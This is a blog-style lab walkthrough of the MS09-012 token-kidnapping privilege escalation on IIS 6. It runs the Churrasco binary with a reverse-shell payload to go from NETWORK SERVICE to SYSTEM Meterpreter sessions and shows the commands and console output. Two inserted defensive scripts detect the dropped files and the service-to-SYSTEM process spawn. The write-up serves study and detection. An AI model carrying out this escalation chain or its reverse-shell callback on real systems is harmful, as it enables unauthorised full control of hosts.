Playing with the MS09-012 Windows Local Exploit

Back in '09 there was a buzz about token kidnapping by Argeniss:
http://www.argeniss.com/research.html

http://www.argeniss.com/research/TokenKidnapping.pdf

It was subsequently patched in MS09-012: http://www.microsoft.com/technet/security/bulletin/MS09-012.mspx

I'm normally violently against uploading binaries to boxes, but until the local exploit functionality is added to msf...

The gist is you can run the Churrasco binary and it will execute a command for you as SYSTEM from NETWORK SERVICE (the privileges your shell gets when exploiting IIS). See the slides for more.

Let's see it in action.

We have our NETWORK SERVICE shell; push up the Churrasco binary and a Metasploit payload, and run it.

*I had issues on my VM getting staged payloads in msf to run, so I opted for shell/reverse_tcp and then tried to upgrade the shell to meterpreter.

[*] Meterpreter session 3 opened (192.168.6.94:443 -> 192.168.6.94:62700)

meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
meterpreter > pwd
c:\windows\system32\inetsrv
Upload the exploit binary and your reverse shell binary. I used the WebDAV vuln that got me on the box to upload it as churrasco.bin. NETWORK SERVICE is picky about where it can write, but something should be writable somewhere if you don't have the file upload route.
meterpreter > shell
Process 3872 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\windows\system32\inetsrv>cd C:\Inetpub\wwwroot
C:\Inetpub\wwwroot>dir
dir
Volume in drive C has no label.
Volume Serial Number is F48F-220E

Directory of C:\Inetpub\wwwroot

05/10/2010 06:53 AM .
05/10/2010 06:53 AM ..
05/10/2010 06:53 AM 410,624 Churrasco.bin
02/21/2003 06:48 PM 1,433 iisstart.htm
05/10/2010 07:19 AM 37,888 shell.bin
05/10/2010 07:43 AM 173 test4.asp;.txt
4 File(s) 2,105,685 bytes
2 Dir(s) 36,227,641,344 bytes free
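From the defender's side, the listing above is the artifact that gives the staging away: two executables and an oddly named file dropped into a webroot that otherwise holds a 2003-vintage iisstart.htm. The following is an added example of mine, not code from the post, that parses a `dir` listing (the sample is constructed from the one shown above, with the `<DIR>` markers that the copy lost put back) and flags files whose extension is not expected in a static/classic-ASP webroot, whose name carries a second extension or a `;`, or whose timestamp is newer than a baseline. The extension allowlist and the baseline date are assumptions to tune per site.

```python
import os
import re
from datetime import datetime

# Constructed sample: the `dir` output of the IIS webroot as shown in the post.
DIR_LISTING = """\
 Directory of C:\\Inetpub\\wwwroot

05/10/2010  06:53 AM    <DIR>          .
05/10/2010  06:53 AM    <DIR>          ..
05/10/2010  06:53 AM           410,624 Churrasco.bin
02/21/2003  06:48 PM             1,433 iisstart.htm
05/10/2010  07:19 AM            37,888 shell.bin
05/10/2010  07:43 AM               173 test4.asp;.txt
               4 File(s)      2,105,685 bytes
               2 Dir(s)  36,227,641,344 bytes free
"""

# Extensions we expect to see in a static / classic-ASP webroot (assumption; tune per site).
EXPECTED_EXTENSIONS = {".htm", ".html", ".asp", ".aspx", ".css", ".js",
                       ".gif", ".jpg", ".png", ".ico", ".txt"}

# Baseline: the stock iisstart.htm timestamp; anything newer is worth a look (assumption).
BASELINE = datetime(2003, 2, 21, 18, 48)

# One `dir` entry: date, time, either <DIR> or a comma-grouped size, then the name.
ENTRY = re.compile(r"^(\d{2}/\d{2}/\d{4})\s+(\d{2}:\d{2} [AP]M)\s+(<DIR>|[\d,]+)\s+(.+?)\s*$")


def parse_dir(listing):
    """Return (name, size_bytes, mtime) for each file entry; directories are skipped."""
    entries = []
    for line in listing.splitlines():
        m = ENTRY.match(line)
        if not m:
            continue  # header, blank and summary lines
        date, time, size, name = m.groups()
        if size == "<DIR>":
            continue
        mtime = datetime.strptime(f"{date} {time}", "%m/%d/%Y %I:%M %p")
        entries.append((name, int(size.replace(",", "")), mtime))
    return entries


def triage_webroot(listing, baseline, expected=EXPECTED_EXTENSIONS):
    """Return {filename: [reasons]} for every file that looks out of place."""
    findings = {}
    for name, size, mtime in parse_dir(listing):
        reasons = []
        stem, ext = os.path.splitext(name)
        if ext.lower() not in expected:
            reasons.append(f"unexpected extension {ext!r} ({size} bytes)")
        if ";" in name or "." in stem:
            reasons.append("name carries a second extension or ';'")
        if mtime > baseline:
            reasons.append(f"modified after baseline ({mtime:%Y-%m-%d %H:%M})")
        if reasons:
            findings[name] = reasons
    return findings


if __name__ == "__main__":
    for name, reasons in triage_webroot(DIR_LISTING, BASELINE).items():
        print(name)
        for reason in reasons:
            print("   -", reason)
```

On the sample the three dropped files are reported and iisstart.htm is not; in practice you would feed it a `dir` capture taken during triage and drive the allowlist from the site's real content types.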
Let's run the exploit and have it kick off our reverse shell back to us. Set up the multi/handler... blah blah
C:\Inetpub\wwwroot>Churrasco.bin shell.bin
Churrasco.bin shell.bin
/churrasco/-->Current User: NETWORK SERVICE
/churrasco/-->Getting Rpcss PID ...
/churrasco/-->Found Rpcss PID: 668
/churrasco/-->Searching for Rpcss threads ...
/churrasco/-->Found Thread: 672
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 676
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 680
/churrasco/-->Thread impersonating, got NETWORK SERVICE Token: 0x730
/churrasco/-->Getting SYSTEM token from Rpcss Service...
/churrasco/-->Found NETWORK SERVICE Token
/churrasco/-->Found LOCAL SERVICE Token
/churrasco/-->Found SYSTEM token 0x728
/churrasco/-->Running command with SYSTEM Token...
/churrasco/-->Done, command should have ran as SYSTEM
on the multi/handler side...
[*] Command shell session 1 opened (192.168.6.94:443 -> 192.168.6.94:62854)


(C) Copyright 1985-2003 Microsoft Corp.

C:\Inetpub\wwwroot>whoami
whoami
nt authority\system

C:\Inetpub\wwwroot>^Z
Background session 1? [y/N] y
msf exploit(handler) > sessions -u 1
msf exploit(handler) > [*] Meterpreter session 2 opened (192.168.6.94:443 -> 192.168.6.94:62855)

msf exploit(handler) > sessions -l

Active sessions
===============

Id Type Information Connection
-- ---- ----------- ----------
1 shell Microsoft Windows [Version 5.2.3790] 192.168.6.94:443 -> 192.168.6.94:62854
2 meterpreter NT AUTHORITY\SYSTEM @ LAB 192.168.6.94:443 -> 192.168.6.94:62855

msf exploit(handler) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
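The patch in MS09-012 is the fix; for hosts that have not had it, the transcript above shows what the escalation looks like in process terms: a process running as NETWORK SERVICE (the IIS worker's command shell, then Churrasco) creates a child that runs as SYSTEM. The following is an added example of mine, not code from the post or from Churrasco, that correlates process-creation records and flags a SYSTEM process whose direct parent runs under a service account and is not a known launcher, reporting the ancestry back to the IIS worker. The record fields and the sample events are constructed; they are assumed to resemble what Sysmon event 1 or Security event 4688 provide (new pid, parent pid, image path, account of the new process's token). The launcher allowlist is an assumption to tune per host.

```python
import ntpath
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record (assumed shape, modelled on Sysmon 1 / 4688)."""
    pid: int
    ppid: int
    image: str
    user: str  # account the new process's token belongs to


SYSTEM = r"NT AUTHORITY\SYSTEM"
SERVICE_ACCOUNTS = {r"NT AUTHORITY\NETWORK SERVICE", r"NT AUTHORITY\LOCAL SERVICE"}

# Service-account images that may legitimately spawn SYSTEM children (assumption; tune per host).
ALLOWED_LAUNCHERS = {"svchost.exe", "wmiprvse.exe"}

# Constructed sample, modelled on the post: IIS worker -> cmd -> Churrasco -> SYSTEM shell,
# alongside ordinary service start-up noise. PIDs are made up except where they echo the post.
EVENTS = [
    ProcEvent(4,    0,    "System",                                SYSTEM),
    ProcEvent(500,  4,    r"C:\WINDOWS\system32\services.exe",     SYSTEM),
    ProcEvent(668,  500,  r"C:\WINDOWS\system32\svchost.exe",      r"NT AUTHORITY\NETWORK SERVICE"),
    ProcEvent(1200, 500,  r"C:\WINDOWS\system32\svchost.exe",      SYSTEM),
    ProcEvent(2100, 1200, r"C:\WINDOWS\system32\inetsrv\w3wp.exe", r"NT AUTHORITY\NETWORK SERVICE"),
    ProcEvent(3872, 2100, r"C:\WINDOWS\system32\cmd.exe",          r"NT AUTHORITY\NETWORK SERVICE"),
    ProcEvent(3900, 3872, r"C:\Inetpub\wwwroot\Churrasco.bin",     r"NT AUTHORITY\NETWORK SERVICE"),
    ProcEvent(3944, 3900, r"C:\Inetpub\wwwroot\shell.bin",         SYSTEM),
]


def lineage(events, pid):
    """Image basenames from the given process up to the root, child first."""
    by_pid = {e.pid: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:   # stop at the root or on a pid cycle
        seen.add(pid)
        chain.append(ntpath.basename(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return chain


def is_web_facing(chain):
    """True when the IIS worker process is somewhere in the ancestry."""
    return "w3wp.exe" in chain


def find_service_to_system(events, allowed=ALLOWED_LAUNCHERS):
    """Return (parent, child, lineage) for each SYSTEM process whose direct parent
    runs as a service account and is not an allowed launcher."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for child in events:
        if child.user != SYSTEM:
            continue
        parent = by_pid.get(child.ppid)
        if parent is None or parent.user not in SERVICE_ACCOUNTS:
            continue
        if ntpath.basename(parent.image).lower() in allowed:
            continue
        hits.append((parent, child, lineage(events, child.pid)))
    return hits


if __name__ == "__main__":
    for parent, child, chain in find_service_to_system(EVENTS):
        tag = "web-facing" if is_web_facing(chain) else "other"
        print(f"[{tag}] {parent.user} pid {parent.pid} ({ntpath.basename(parent.image)}) "
              f"spawned SYSTEM pid {child.pid} ({ntpath.basename(child.image)})")
        print("   ancestry:", " <- ".join(chain))
```

The rule is deliberately narrow (direct parent under a service account, child as SYSTEM) so that it stays quiet on a normal box; the ancestry string is what lets an analyst tell an IIS-originated chain from, say, a scheduled task, and the allowlist is where the remaining false positives get handled.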
